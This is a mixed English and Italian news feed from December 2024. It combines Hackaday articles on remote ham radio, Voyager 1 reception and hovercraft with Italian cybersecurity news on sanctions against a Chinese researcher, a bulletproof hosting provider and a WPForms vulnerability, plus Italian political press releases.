FLOSS Weekly Episode 813: Turn Off the Internet
This week, Jonathan Bennett, Simon Phipps, and Aaron Newcomb chat about retrocomputing, Open Source AI, and … politics? How did that combination of topics come about? Watch to find out!
youtube.com/embed/RDRR4ti-zdQ?…
Did you know you can watch the live recording of the show Right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
play.libsyn.com/embed/episode/…
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Places to follow the FLOSS Weekly Podcast:
Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
hackaday.com/2024/12/11/floss-…
10 Milioni di Dollari per Chi Trova Guan! Il Ricercatore Cinese che Colpì 81.000 Firewall
l’Office of Foreign Assets Control (OFAC) del Dipartimento del Tesoro degli Stati Uniti D’America sta sanzionando la società di sicurezza informatica Sichuan Silence Information Technology Company, Limited (Sichuan Silence) e uno dei suoi dipendenti, Guan Tianfeng (Guan), entrambi con sede nella Repubblica Popolare Cinese (RPC), per il loro ruolo nella compromissione di decine di migliaia di firewall Sophos in tutto il mondo nell’aprile 2020. Molte delle vittime erano società di infrastrutture critiche statunitensi.
Gli autori di attacchi informatici malintenzionati, compresi quelli che operano in Cina, continuano a rappresentare una delle minacce più grandi e persistenti per la sicurezza nazionale degli Stati Uniti, come evidenziato nella Valutazione annuale delle minacce del 2024 pubblicata dall’Office of the Director of National Intelligence.
“L’azione di oggi sottolinea il nostro impegno a denunciare queste attività informatiche dannose, molte delle quali rappresentano un rischio significativo per le nostre comunità e i nostri cittadini, e a ritenere responsabili gli autori dei loro piani”, ha affermato il sottosegretario facente funzione del Tesoro per il terrorismo e l’intelligence finanziaria Bradley T. Smith. “Il Tesoro, come parte dell’approccio coordinato del governo degli Stati Uniti per affrontare le minacce informatiche, continuerà a sfruttare i nostri strumenti per interrompere i tentativi degli autori di attacchi informatici dannosi di minare la nostra infrastruttura critica”.
Oggi, il Dipartimento di Giustizia (DOJ) ha desecretato un atto di accusa contro Guan per la stessa attività. Inoltre, il Dipartimento di Stato degli Stati Uniti ha annunciato un’offerta di ricompensa Rewards for Justice fino a10 milioni di dollari per informazioni su Sichuan Silence o Guan.
Compromissione del firewall di aprile 2020
Guan Tianfeng ha scoperto un exploit zero-day in un prodotto firewall. Tra il 22 e il 25 aprile 2020, Guan Tianfeng ha utilizzato questo exploit zero-day per distribuire malware a circa 81.000 firewall di proprietà di migliaia di aziende in tutto il mondo. Lo scopo dell’exploit era quello di utilizzare i firewall compromessi per rubare dati, inclusi nomi utente e password. Tuttavia, Guan ha anche tentato di infettare i sistemi delle vittime con la variante del ransomware Ragnarok. Questo ransomware disabilita il software antivirus e crittografa i computer sulla rete di una vittima se tenta di porre rimedio alla compromissione.
Oltre 23.000 dei firewall compromessi si trovavano negli Stati Uniti. Di questi firewall, 36 proteggevano i sistemi delle aziende di infrastrutture critiche statunitensi. Se una di queste vittime non avesse patchato i propri sistemi per mitigare l’exploit, o le misure di sicurezza informatica non avessero identificato e rimediato rapidamente all’intrusione, il potenziale impatto dell’attacco ransomware Ragnarok avrebbe potuto causare gravi lesioni o la perdita di vite umane.
Una vittima era una società energetica statunitense che era attivamente coinvolta in operazioni di perforazione al momento della compromissione. Se questa compromissione non fosse stata rilevata e l’attacco ransomware non fosse stato sventato, avrebbe potuto causare il malfunzionamento delle piattaforme petrolifere, causando potenzialmente una significativa perdita di vite umane.
Guan Tianfeng e il silenzio del Sichuan
Guan è un cittadino cinese ed era un ricercatore di sicurezza presso Sichuan Silence al momento della compromissione. Guan ha gareggiato per conto di Sichuan Silence in tornei di sicurezza informatica e ha pubblicato exploit zero-day scoperti di recente su forum di vulnerabilità ed exploit, anche sotto il suo soprannome GbigMao. Guan è stato responsabile della compromissione del firewall di aprile 2020.
Sichuan Silence è un appaltatore governativo per la sicurezza informatica con sede a Chengdu, i cui clienti principali sono i servizi di intelligence della RPC. Sichuan Silence fornisce a questi clienti prodotti e servizi di sfruttamento della rete informatica, monitoraggio delle e-mail, cracking delle password con forza bruta e operazioni di manipolazione del pubblico. Inoltre, Sichuan Silence fornisce a questi clienti apparecchiature progettate per sondare e sfruttare i router di rete target. Un dispositivo di pre-posizionamento utilizzato da Guan nella compromissione del firewall di aprile 2020 era in realtà di proprietà del suo datore di lavoro, Sichuan Silence.
L’OFAC ha designato Sichuan Silence e Guan ai sensi dell’Ordine esecutivo (EO) 13694, modificato dall’EO 13757, per essere responsabili o complici, o per aver preso parte, direttamente o indirettamente, ad attività informatiche provenienti da, o dirette da, persone situate, in tutto o in parte sostanziale, al di fuori degli Stati Uniti, che hanno ragionevolmente probabilità di causare, o di aver contribuito materialmente a, una minaccia significativa alla sicurezza nazionale, alla politica estera, alla salute economica o alla stabilità finanziaria degli Stati Uniti e che hanno lo scopo o l’effetto di danneggiare, o altrimenti compromettere significativamente la fornitura di servizi da parte di, un computer o una rete di computer che supportano una o più entità in un settore di infrastrutture critiche.
L'articolo 10 Milioni di Dollari per Chi Trova Guan! Il Ricercatore Cinese che Colpì 81.000 Firewall proviene da il blog della sicurezza informatica.
MILLEPROROGHE & CLEP
agenparl.eu/2024/12/11/millepr…
(AGENPARL) – mer 11 dicembre 2024 MILLEPROROGHE, COLUCCI (M5S): SU AUTONOMIA E LEP GOVERNO PERSEVERA E VA CONTRO CONSULTA
ROMA, 11 dic. – “Nel testo bollinato del decreto Milleproroghe all’articolo 16 il governo trasferisce presso il dipartimento per gli Affari regionali e le Autonomie, quindi al ministro Calderoli, l’attività istruttoria per la determinazione dei livelli essenziali delle prestazioni (LEP) e dei relativi costi e fabbisogni standard, fino al 31 dicembre 2025. Quindi, il Governo persevera nell’errore di avocare a sè la determinazione dei Lep, calpestando il Parlamento e soprattutto la Corte Costituzionale che, nella recente sentenza sulla legge per l’Autonomia Differenziata, ha bocciato questa possibilità. Vorremmo anche capire cosa significa che l’attività istruttoria è trasferita “presso” e non “al” dipartimento, il Comitato per la determinazione dei LEP, presieduto dal prof. Cassese, è stato licenziato o semplicemente trasferito presso il Ministero? Sarebbe doveroso il suo scioglimento, a seguito della sentenza della Corte Costituzionale che ha bocciato la legge Calderoli e le collegate norme contenute nella legge di Bilancio 2023. In ogni caso questa contenuta nel dl Milleproroghe è un’operazione a dir poco spregiudicata, tenuto conto che la legge Calderoli è stata bocciata dalla Corte in tutti i suoi pilastri portanti, e lo è ancor di più se si considera che l’attività istruttoria si riferisce alla determinazione delle sole materie Lep e non anche, come pure ha stabilito la Corte, delle materie non Lep nelle parti in cui incidano su diritti sociali e civili. E’ proprio il caso di dire che non c’è peggior sordo di chi non vuol sentire. Al governo e alla maggioranza lo hanno ricordato tantissimi cittadini che hanno firmato per cancellare l’Autonomia, poi la Consulta con la sentenza che smantella la legge Calderoli. Se vogliono perseverare, prenderanno altre batoste e purtroppo a pagare saranno i cittadini che assistono a questo scempio istituzionale che può avere drammatiche ricadute sulla loro vita quotidiana”.
Lo afferma il capigruppo M5S nella commissioni Affari Costituzionali della Camera Alfonso Colucci.
—————–
Ufficio Stampa Parlamento
Movimento 5 Stelle
MILLEPROROGHE, COLUCCI (M5S): SU AUTONOMIA E LEP GOVERNO PERSEVERA E VA CONTRO CONSULTA
(AGENPARL) - Roma, 11 Dicembre 2024(AGENPARL) – mer 11 dicembre 2024 MILLEPROROGHE, COLUCCI (M5S): SU AUTONOMIA E LEP GOVERNO PERSEVERA E VA CONTRO CONSULTA ROMA, 11 dic.Agenparl
“Governare il digitale è una questione di democrazia”. In Fondazione Einaudi presentata “La democrazia migliore” di Gianluca Sgueo
@Politica interna, europea e internazionale
“Mark Zuckerberg ha dichiarato qualche tempo fa: ‘Io metto in contatto quattro miliardi di persone con i loro governi’. Si è paragonato così con il
It’s Remotely Ham Radio
Have you ever considered running your ham radio remotely? It has been feasible for years but not always easy. Recently, I realized that most of the pieces you need to get on the air remotely are commonplace, so I decided to take the plunge. I won’t give step-by-step instructions because your radio, computer setup, and goals are probably different from mine. But I will give you a general outline of what you can do.
I’m fortunate enough to have a sizeable freestanding shop in my backyard. When I had it built, I thought it was huge. Now, not so much. The little space is crammed with test equipment, soldering gear, laser cutters, drill presses, and 3D printers. I’ve been a ham for decades, but I didn’t have room for the radios, nor did I have an antenna up. But a few months ago, I made space, set some radios up, strung out a piece of wire, and got back on the air. I had so much fun I decided it was time to buy a new radio. But I didn’t want to have to go out to the shop (or the lab, as I like to call it) just to relax with some radio time.
Good News!
The good news is that this makes life easier for going remote. The lab has a good network connection back to the house and I don’t have to worry about my radio being open to the public Internet. I also don’t have to worry about the transmitter going rogue since, if it does, I can simply walk out the back door and turn it off.
On the other hand, you could probably operate the station from anywhere in the world you have a network connection. You can VPN back into the local network. I have the transmitter on a switch so Alexa or Google can turn it on and off. The radio and all the software have safeguards such as maximum transmit time timeouts and a feature to shut down transmitting if it loses a network connection. So, if you are brave enough and your local laws permit it, you could probably operate from anywhere.
One Way
Nowadays, having a computer connected to your radio is almost a requirement. Even my old radio could take commands over an RS232 port. The new rig, an Icom IC-7300, has a USB port, and it looks like both a serial port and a sound card.
That last bit is especially handy since you used to have to figure out how to cable between the rig and the computer’s sound card. Now the rig is the computer’s sound card — or, at least, one of them.
Why?
If you are a ham, you can probably skip ahead, but if you aren’t, you might wonder why you need a computer. Of course, some of it is just handy. You can keep your log and look up propagation or callsigns. But you don’t have to be connected to a radio to do that. It just makes it easier.
There are two reasons having the computer connected to the radio really pays off. First, you can send and receive digital signals using a sound card.
Digital signals include text like RTTY or PSK31 where you type messages to each other, pictures in the form of SSTV, or computer-to-computer modes like FT8. Some people experiment with digital voice modes. There are many other options.
The other thing a computer can do is control your radio. Sure, you can use the knobs and buttons, but a computer can control it, which, for remote access, is essential. It can also help when you want a program to, for example, look up a station you’ve heard, find its location, calculate the direction that station is relative to you, and move your antenna to point in that direction.
How?
The simplest way to create a remote station is just to use a remote desktop program to log into the computer at your station. For digital modes, that may even be the best way, but it means all the software runs on the station computer (which could be a Raspberry Pi, for example). It also means that the audio you want to hear or send has to traverse over the remote desktop software, and most of them will prioritize screen traffic over audio. Plus if either computer has an unusually large or small screen, it isn’t always a good experience.
While I’ve played with that, I elected to go a different way. I wanted the radio and computer to be more or less a terminal and run the software to do things on my computer back in the office or my laptop.
To do this, you need two things: a way to control the radio and a way to send and receive audio as though you were on the station PC.
Control
Rig control is the trickiest part because it depends on what radio you have. Many radio manufacturers supply their own software, but often community offerings are better. In my case, I used the wfview software which works will with Icom radios. However, there are many other options for both Icom and other radios.
I picked it because it knows how to speak remotely to another instance of itself and can expose a standard “hamlib” interface that many pieces of ham software use to control radios.The basic setup for FT8
FT-8 and Audio
The audio setup is a bit trickier. If all you want to do is listen and talk, then wfview does fine all by itself. However, my goal was to be able to install software for FT8, PSK31, RTTY, and even digital voice. In this case, I’m using JTDX for FT8.
JTDX can control a radio over a hamlib network connection. That isn’t turned on in wfview by default, but it is easy to turn on and assign a port number. In theory, you could do this on the remote copy of wfview or the local copy, but I chose to do it on the local copy. That means JTDX talks to the radio on the local 127.0.0.1 IP address.
For the audio, I needed a way to pipe audio from the fake sound card provided by wfview to the input of JTDX. Luckily, I just wrote a Linux Fu post about that very topic. If you don’t mind rebuilding everything, you can make a single audio loopback, but I made two: one for the radio input and one for the radio output.The PipeWire configuration for FT8
By using two that I create on system startup (for example, in the /etc/rc.local file or using systemd), the programs always have a “device” that they can connect to. Just don’t forget the loopback have to run under your user ID, not root. If you rely on plain PipeWire or PulseAudio to make the connections, you will have to rebuild the connections each time.
Note that radio-in and radio-out are always available (assuming you created them). So when the programs start up, they can find the pipe even if the other side of the pipe doesn’t exist yet. That makes it easy to keep everything connected. Instead of branching the radio output to the speakers, the monitor output of the pipe does the job.
Creating these loopback devices is simple:
pw-loopback -n radio-in -m '[FL FR]' --capture-props='media.class=Audio/Sink' --playback-props='media.class=Audio/Source'
pw-loopback -n radio-out -m '[FL FR]' --capture-props='media.class=Audio/Sink' --playback-props='media.class=Audio/Source'
If you want to know more, check out my earlier post on PipeWire.
If you use Windows, there are ways to do it there, too (including if you are running Linux on one side and Windows on the other). The wfview audio configuration page has some details. While they suggest VBAN for Windows, you can use it with Linux, too, although even if you have a mixed setup, you can always use the native Linux facilities.
On the Air
Does it work? It sure does, as you can see in the accompanying screenshot. The latency of the audio over the network is usually under 200 milliseconds, so that’s workable, although if you have a lot of delay, it might present a problem. I tried a VPN connection from a remote location, but I still had less than 400 milliseconds. For some reason, over a long period of time, the latency creeps up even on a local network, but restarting wfview seems to fix it.Operating FT8 remotely
Since you won’t have my exact setup, I won’t go through the configuration, but clearly you’ll have to work out the connections for audio to each program. You may also experiment with different codecs — it will depend on your software.
Setting up a remote station isn’t nearly as hard as it used to be. Modern radios are easy to control over a network — some even have network jacks. Your home network is probably up to the task of shipping audio around, and there are solutions for piping audio between programs for Linux, Windows, or even both.
Keep in mind that while I did this with FT8, it works with voice or just about any other digital mode. You can even do CW, but — as far as I know — wfview won’t let you use a key. You’ll have to type your Morse code in. If you need a primer on FT8, we got you. If you prefer your remote control in the browser, this might help you.
Ministero dell'Istruzione
Il Ministro Giuseppe Valditara ha incontrato oggi, presso il Salone dei Ministri del #MIM, l’ufficio di coordinamento nazionale dei Presidenti di Consulta Regionali.Telegram
Ora in Siria i ‘terroristi’ sono nostri alleati: una ripulitura tipica dei media occidentali
di Paolo Ferrero dal Fatto Quotidiano - Il vincitore militare della guerra lampo in Siria è Abu Mohamed al Golani, il capo di Hayat Tahir al Sham. Golani èRifondazione Comunista
Amateur Radio Operators Detect Signals from Voyager 1
At the time of its construction in the 1950s, the Dwingeloo Radio Observatory was the largest rotatable telescope in the world with a dish diameter of 25 meters. It was quickly overtaken in the rankings but was used by astronomers for decades until it slowly fell into disuse in the early 2000s. After a restoration project the telescope is now a national heritage site in the Netherlands where it is also available for use by radio amateurs. Recently this group was able to receive signals from Voyager 1.
Famously, Voyager 1 is the furthest manmade object from Earth, having been launched on a trajectory out of the solar system in 1977. As a result of distance and age, the signals it sends out are incredibly faint. The team first had to mount a new antenna to the dish, which was not originally designed for signals in this frequency which added to the challenge. They then needed to use orbital predictions of the spacecraft in order to target the telescope and also make the correct adjustments to the received signal given that there is significant Doppler shift now as well. But with that all out of the way, the team was successfully able to receive the Voyager 1 signal on this telescope.
Only a few telescopes in the world have ever been able to accomplish this feat, making it all the more impressive. Normally Voyager 1 is received using the Deep Space Network, a fleet of much larger dishes stationed around the world and designed for these frequencies. But this team is used to taking on unique challenges. They also decoded the first ham radio station on the moon and made a radar image of the moon using LoRa.
Dwingeloo telescope receives signals from Voyager 1
camras.nl/en/blog/2024/dwingel…
ELITETEAM: Il Service Provider che i Criminal Hacker Recensiscono con 5 Stelle!
Il team Knownsec 404 ha identificato una vasta rete del provider di hosting ELITETEAM, che fornisce infrastrutture ai criminali informatici. Questi servizi consentono agli aggressori di eludere i controlli legali e supportano il funzionamento di malware, siti fraudolenti, e-mail di spam e altre attività illegali. Gli esperti sottolineano che questo genere di hosting rappresentano una seria minaccia per la sicurezza informatica globale, poiché operano in condizioni di debole regolamentazione legislativa e sono altamente resistenti alle misure legali.
Secondo il rapporto, ELITETEAM è stata registrata alle Seychelles nel novembre 2020 con il nome “1337TEAM LIMITED”. Il provider possiede il sistema autonomo AS51381 e fornisce servizi relativi all’hosting di siti di phishing, malware, server di comando e controllo botnet e infrastrutture per frodi in criptovaluta. La particolarità di tali fornitori è la selezione deliberata di giurisdizioni con una regolamentazione legislativa debole.
Secondo il Phishing Network Study 2021 di Interisle, solo un segmento della rete ELITETEAM con 256 indirizzi IP si è classificato all’ottavo posto nel mondo per attività dannose. Sulla piattaforma VirusTotal tutti i 256 indirizzi IP della rete ELITETEAM sono stati contrassegnati come dannosi, il che conferma il loro utilizzo attivo negli attacchi informatici. Sulla piattaforma ThreatFox, diversi indirizzi IP nel 2024 sono stati contrassegnati con indicatori di compromissione (IOC) per malware come Amadey e RedLine, indicandone l’utilizzo in attacchi di phishing e distribuzione di malware.
Gli specialisti di Cloudflare hanno scoperto che gli indirizzi IP di ELITETEAM vengono utilizzati attivamente per hackerare i siti WordPress. Gli attacchi prendono di mira le pagine di login e le interfacce XML-RPC, dove gli aggressori tentano di sfruttare le vulnerabilità per ottenere l’accesso ai sistemi.
Trend Micro ha collegato l’infrastruttura ELITETEAM alla distribuzione dei ransomware Quakbot ed Emotet. Solo nel primo trimestre del 2023 sono stati registrati 200mila casi di traffico malevolo associato all’infrastruttura ELITETEAM; 140mila di loro sono registrati alle Seychelles. Questi programmi venivano utilizzati per crittografare i dati sulle reti aziendali a scopo di estorsione.
L’infrastruttura di ELITETEAM è stata utilizzata anche per supportare le truffe di criptovaluta sul mercato ombra di Hydra, consentendo transazioni illegali e riciclaggio di denaro. Queste azioni hanno attirato l’attenzione dell’Interpol, che ha inviato diverse richieste per indagare sulle attività dell’azienda.
L’analisi dei dati sul segmento di rete 185.215.113.0/24 attraverso la piattaforma ZoomEye ne ha rivelato le caratteristiche principali: porte aperte per l’accesso remoto (22/3389), servizi web (80/443), spam (25/465/587) e Server C2 (7766). Dieci indirizzi IP di questo segmento hanno porte di posta aperte, il che potrebbe indicare che vengono utilizzati per inviare spam.
La ricerca ha permesso di collegare la sottorete 185.208.158.0/24 al segmento principale di ELITETEAM. Dei 256 indirizzi presenti su questa sottorete, 95 sono contrassegnati come dannosi. Entrambe le reti sono registrate alle Seychelles e sono tecnicamente connesse tramite certificati SSL comuni. Otto indirizzi IP di entrambe le reti hanno utilizzato identiche impronte SSL tra settembre e novembre 2024, indicando il controllo da parte di un singolo gruppo di hacker.
Un’analisi dettagliata ha rivelato cinque indirizzi IP sospetti: 185.208.158.114, 185.208.158.115, 77.91.68.21, 147.45.47.102 e 109.107.182.45. Questi indirizzi vengono assegnati a causa delle caratteristiche uniche dei certificati SSL e del contenuto HTTP. Ad esempio, l’impronta digitale del certificato SSL C416E381FAF98A7E6D5B5EC34F1774B728924BD8 è stata trovata sia sulla sottorete 185.208.158.0/24 che sulla rete principale ELITETEAM.
Gli esperti osservano che le attività di tali hosting provider creano condizioni favorevoli per i criminali informatici. Dal 2015 il gruppo APT28 ha effettuato più di 80 attacchi utilizzando hosting bulletproof per phishing, furto di dati e spionaggio. L’ubicazione delle infrastrutture in paesi con una regolamentazione permissiva consente agli aggressori di eludere i procedimenti giudiziari e continuare le operazioni a lungo termine.
L'articolo ELITETEAM: Il Service Provider che i Criminal Hacker Recensiscono con 5 Stelle! proviene da il blog della sicurezza informatica.
NIS 2 e ISO 9001: modello ibrido per la gestione integrata della qualità e della cyber security
In un’epoca in cui sicurezza informatica e qualità dei processi aziendali sono essenziali per la competitività e la sostenibilità, l'integrazione tra ISO 9001 e decreto NIS 2 rappresenta un’opportunità per le organizzazioni. Ecco come migliorare l'efficienza operativa garantendo la protezione di reti, sistemi e informazioni
L'articolo NIS 2 e ISO 9001: modello ibrido per la gestione integrata della qualità e della cyber security proviene da Cyber Security 360.
Trasparenza e privacy nei concorsi pubblici: c’è ancora qualcosa da sistematizzare
La recente sanzione privacy comminata all’INPS per la diffusione dei dati personali di migliaia di partecipanti a un concorso pubblico induce a ritornare sull’esigenza di individuare un equilibrato baricentro fra le esigenze di trasparenza e controllo della P.A e di tutela della riservatezza dei dati personali. Ecco i punti critici
L'articolo Trasparenza e privacy nei concorsi pubblici: c’è ancora qualcosa da sistematizzare proviene da Cyber Security 360.
Attacco di Salt Typhoon: la persistenza nelle reti USA e le vulnerabilità infrastrutturali
L’attacco persistente alle reti di comunicazione USA e lo sfruttamento delle vulnerabilità infrastrutturali ha reso prioritaria la cooperazione tra settore pubblico e privato, unita a investimenti mirati per proteggere tali infrastrutture critiche e i dati sensibili da intrusioni simili in futuro. Facciamo il punto
L'articolo Attacco di Salt Typhoon: la persistenza nelle reti USA e le vulnerabilità infrastrutturali proviene da Cyber Security 360.
Trasferimento dati personali ad Autorità extra UE: l’EDPB chiarisce quando è lecito
Le linee guide dell’EDPB sull’articolo 48 del GDPR ribadiscono che una decisione giudiziaria straniera o una richiesta di un'autorità straniera non costituiscono un presupposto di liceità per il trasferimento di dati personali: occorre un accordo internazionale che giustifichi il trasferimento. Facciamo chiarezza
L'articolo Trasferimento dati personali ad Autorità extra UE: l’EDPB chiarisce quando è lecito proviene da Cyber Security 360.
Stato dell’arte cyber in UE, Enisa: essenziale una cooperazione operativa
Nel documento dal titolo “2024 Report on the state of cybersecurity in the Union”, Enisa fornisce un'analisi approfondita e dati concreti sullo sviluppo delle capacità di cibersicurezza a vari livelli, offrendo anche raccomandazioni strategiche per migliorare la cyber security nell'Unione
L'articolo Stato dell’arte cyber in UE, Enisa: essenziale una cooperazione operativa proviene da Cyber Security 360.
The Hovercraft Revolution and Finding the Right Niche for a Technology
In the world of transportation, some technologies may seem to make everything else appear obsolete, whether it concerns airplanes, magnetic levitation or propelling vehicles and craft over a cushion of air. This too seemed to be the case with hovercraft when they exploded onto the scene in the 1950s and 1960s, seemingly providing the ideal solution for both commercial and military applications. Freed from the hindrances of needing a solid surface to travel upon, or a deep enough body of water to rest in, hovercraft gave all the impressions of combining the advantages of aircraft, ships and wheeled vehicles.
Yet even though for decades massive passenger and car-carrying hovercraft roared across busy waterways like the Channel between England & mainland Europe, they would quietly vanish again, along with their main competition in the form of super fast passenger catamarans. Along the English Channel the construction of the Channel Tunnel was a major factor here, along with economical considerations that meant a return to conventional ferries. Yet even though one might think that the age of hovercraft has ended before it ever truly began, the truth may be that hovercraft merely had to find its right niches after a boisterous youth.
An example of this can be found in a recent BBC article, which covers the British Griffon Hoverwork company, which notes more interest in new hovercraft than ever, as well as the continued military interest, and from rescue workers.
Why Hovercraft Were Terrible
Although we often think of hovercraft as something like something modern, they have been something that people have been tinkering around with for hundreds of years, much like airplanes, maglev and so on. These were all rather small-scale, however, and it took until the 20th century for some of the fundamentals got worked out. The addition of the flexible skirt to contain the air in a so-called momentum curtain to raise the hovercraft further off the ground and add robustness when traveling over less gentle terrain proved fundamental, and within a few decades passenger behemoths were making their way across the English Channel, gently carried on cushions of air:
youtube.com/embed/Y8I3aK5A13U?…
Yet not all was well. As can be ascertained by the above video, the noise levels were very high, and so was the fuel usage for these large hovercraft. The skirts ended up wearing down much faster than expected, resulting in a need for daily maintenance and replacement of skirt sections. By the 1990s catamaran ferries offered a similar experience as the clunky SR-N4s, while requiring much less maintenance. When the Channel Tunnel opened in 1994, the writing was on the wall for Britain’s passenger hovercraft.Aérotrain I-80 upon delivery in 1969 (Source: Archives Association des Amis de Jean Bertin, Wikimedia)
Years before, the high fuel usage and a range of other issues had already ended the dream of hovertrains. These would have done much the same as maglev trains, only without the expensive tracks. Unfortunately these hovertrains uncovered another issue with the air cushion concept. Especially at higher velocities the loss of air from this cushion would increase significantly, while using the environmental air to keep the cushion on pressure becomes harder, not unlike with the air intakes of airplanes.
Ultimately these issues caught up, with the hovertrain’s swansong occurring in the 1970s with the Aérotrain I-80 and UTACV already. The world’s largest commercial hovercraft – the SR.N4 – made its final trip in 2000 when its operator coasted on for a few more years with its catamaran ferries before closing up shop. These days the only way you can see these artefacts from the Age of Hover is in museums, with the GH-2007 Princess Anne SR.N4 as the last remaining example of its kind at the Hovercraft Museum in Lee-on-the-Solent in Hampshire.
Recently the Tim Traveller YouTube channel went over to this museum to have a gander:
youtube.com/embed/x5jmrW1HvMQ?…
Why Hovercraft Are Great
Baien at the Port of Oita, 2023 (Credit: Pinkaba, Wikimedia, CC BY-SA 4.0)
So with that said, obviously hovercraft and its kin were all investigated, prodded & poked and found to be clearly wanting by the 1990s, before the whole idea was binned as clearly daft and bereft of reason. While this might be true for massive passenger hovercraft and hovertrains, the reality for other niches is far less bleak. Especially with the shift from the old-school, inefficient engines to modern-day engines, and more of a need for smaller craft.
Currently passenger hovercraft services are quite limited, with the Japanese city of Oita having a hovercraft service between the city center and the airport. Here hovercraft make sense as they are over twice as fast on the 33 kilometer route as the bus service. These hovercraft are built by British hovercraft company Griffon Hoverwork Ltd., as currently the only company building such craft in the world. Similarly, the Isle of Wight’s Hovertravel is a hovercraft passenger service between the island and the mainland, with two Griffon 12000TD hovercraft providing the fastest possible way for people (including many tourists) to travel. Hovertravel’s services are also chartered on occasion with events.
For these tourism-oriented applications the benefits of hovercraft are clear: they are the fastest way to travel especially across water (74 km/h for the 12000TD) and are rather flexible so that they can be used ad-hoc with events that do not have more than a patch of concrete or grass bordering the water. Noise levels with modern engines and with smaller craft are also significantly more manageable.
As addressed in the earlier referenced BBC article, there are three other niches where hovercraft have found a warm home. These include hobbyists who enjoy racing with small hovercraft, as well as rescuers who benefit from having a way to reach people no matter whether they’re stuck on a frozen pond, in a muddy area, in the middle of a swamp or somewhere else that’s hostile to any wheeled or tracked vehicle, never mind rescuers trying to reach someone by foot. Here the property of a hovercraft of not caring much about what exactly its air cushion is pushing against is incomparable and saves many lives.
To Land Where Nobody Has Landed Before
LCAC-55, a Navy Landing Craft Air Cushion (LCAC), maneuvers to enter the well deck of the amphibious assault ship USS Kearsarge (LHD-3). (Credit: US Navy)
Naturally, the other niche where a hovercraft’s disregard for things like mud, wet sand and rocks is useful is when you are a (military) force trying to carry lots of people, gear and heavy equipment onshore, without such minor details like finding a friendly harbor getting in the way. Although the US Navy and Army had tried to use hovercraft in a more direct role before, such as the unsuccessful SR.N5-derived PACV in Vietnam, their best role was found to be as landing craft: the Landing Craft Air Cushion, or LCAC.
A total of 97 have been built of these LCACs since their introduction in 1986 and they see continuous use as transport of cargo and personnel from ship to shore, across beaches and so on. Due to increasing (weight) demands they are now slated to be replaced by the Ship-to-Shore Connector (SSC). These are very similar to the LCACs, but offer more capacity (~20 ton more), while offering improvements to the engines, the skirt design and a two-person cockpit with fly-by-wire joystick controls.
Similarly, the Chinese Navy (PLAN) also has an LCAC in service (the Jinsha II-class type 726), and both Russia and Hellenic Navy operate formerly Soviet Zubr-class LCACs, which is the largest currently active hovercraft. A few more Zubrs were constructed by Ukraine for both Greece and China, with the latter also building them under license as the Type 958 LCAC.
Happy Niche
Because physics and economics are relentless, hovercraft, maglev and catamarans never made us bid farewell to wheels, tracks, hulls and simple train tracks, but each of these have found their own happy niches to live in. Meanwhile economics change and so does our understanding of materials, propulsion methods and other factors that are relevant to these technologies as they compete with transportation methods that have been a part of human history for much longer already.
For now at least hovercraft seem to have found a couple of niches where their properties provide benefits that are unmatched, whether it’s in simply being the fastest way to move over water, mud and concrete all in one trip, or for the most fun to be had while racing over such a track, or for providing life-saving aid, or to carry heavy loads from ship-to-shore when said shore is muddy marshes, a beach or similar.
Even if we will never see the likes of the Princess Anne again crossing the Channel, the hovercraft is definitely here to stay.
Featured image: Photo of the Solent Flyer hovercraft operated by Hovertravel approaching Ryde (Credit: Geni, Wikimedia)
Allerta WordPress: Vulnerabilità critica in WPForms mette a rischio 3 milioni di siti!
È stata rilevata una vulnerabilità nel plug-in WPForms WordPress, un pluginutilizzato da oltre 6 milioni di siti, che consente agli utenti di emettere rimborsi arbitrari tramite Stripe o annullare abbonamenti.
WPForms è un generatore di moduli per WordPress che ti consente di creare moduli di contatto, iscrizione e pagamento e supporta anche Stripe, PayPal, Square e altri sistemi di pagamento.
Il problema viene monitorato sotto il CVE-2024-11205 e non è considerato critico in quanto richiede l’autenticazione per essere sfruttato. Tuttavia, dato che un utente necessita di autorizzazioni a livello di abbonato e che i sistemi di registrazione sono disponibili sui siti vulnerabili per altri bug noti, il problema potrebbe rappresentare una seria minaccia.
La vulnerabilità è stata scoperta dal ricercatore indipendente sulla sicurezza informatica vullu164, che ha ricevuto 2.376 dollari per la sua scoperta come parte del programma Wordfence bug boony.
Il problema è dovuto all’uso errato della funzione wpforms_is_admin_ajax() per determinare se una richiesta AJAX proviene da un amministratore. In effetti, il bug consente a qualsiasi utente autenticato (anche a livello di abbonato) di utilizzare funzioni come ajax_single_payment_refund(), che esegue un rimborso in Stripe, e ajax_single_payment_cancel(), che annulla un abbonamento.
La vulnerabilità colpisce le versioni di WPForms dalla 1.8.4 alla 1.9.2.1 e il mese scorso gli sviluppatori del plugin, Awesome Motive, hanno rilasciato una patch come parte della versione 1.9.2.2.
Secondo le statistiche di wordpress.org, su circa la metà di tutti i siti che utilizzano WPForms, il plugin non è stato aggiornato a una versione sicura (e nemmeno all’attuale ramo 1.9.x), ovvero il numero di risorse vulnerabili è almeno 3 milioni.
Gli specialisti di Wordfence sottolineano di non aver ancora rilevato lo sfruttamento attivo di CVE-2024-11205, ma raccomandano vivamente agli amministratori di aggiornare il plugin alla versione 1.9.2.2 il prima possibile o di disabilitarlo temporaneamente.
L'articolo Allerta WordPress: Vulnerabilità critica in WPForms mette a rischio 3 milioni di siti! proviene da il blog della sicurezza informatica.
E, a parte il colpo, sotto sotto non sono nemmeno molto dispiaciuta (volevo già cambiare mestiere).
rag. Gustavino Bevilacqua reshared this.
Podcast: 3D Printed Guns and UnitedHealthcare
This week we talk about the weapon used by the alleged UnitedHealthcare CEO murderer; the sad state of OSINT after a suspect's name is released; how health insurance companies have tried to scrub leadership from the web; moderation challenges on…Joseph Cox (404 Media)
Politico.Eu incorona Meloni: “È la persona più potente d’Europa”. Ma ecco perché non è una buona notizia per l’Italia (né per l’Ue)
@Politica interna, europea e internazionale
La prestigiosa testata internazionale Politico.Eu incorona Giorgia Meloni come “persona più potente d’Europa” per il 2025 e la definisce “uomo forte”, sottolineando la sua pretesa di
Unexpectedly Interesting Payphone Gives Up Its Secrets
Reverse engineering a payphone doesn’t sound like a very interesting project, at least in the United States, where payphones were little more than ruggedized versions of residential phones with a coin mechanism attached. Phones in other parts of the world were far more interesting, though, as this look at the mysteries of a payphone from Israel reveals (in Hebrew; English translation here.)
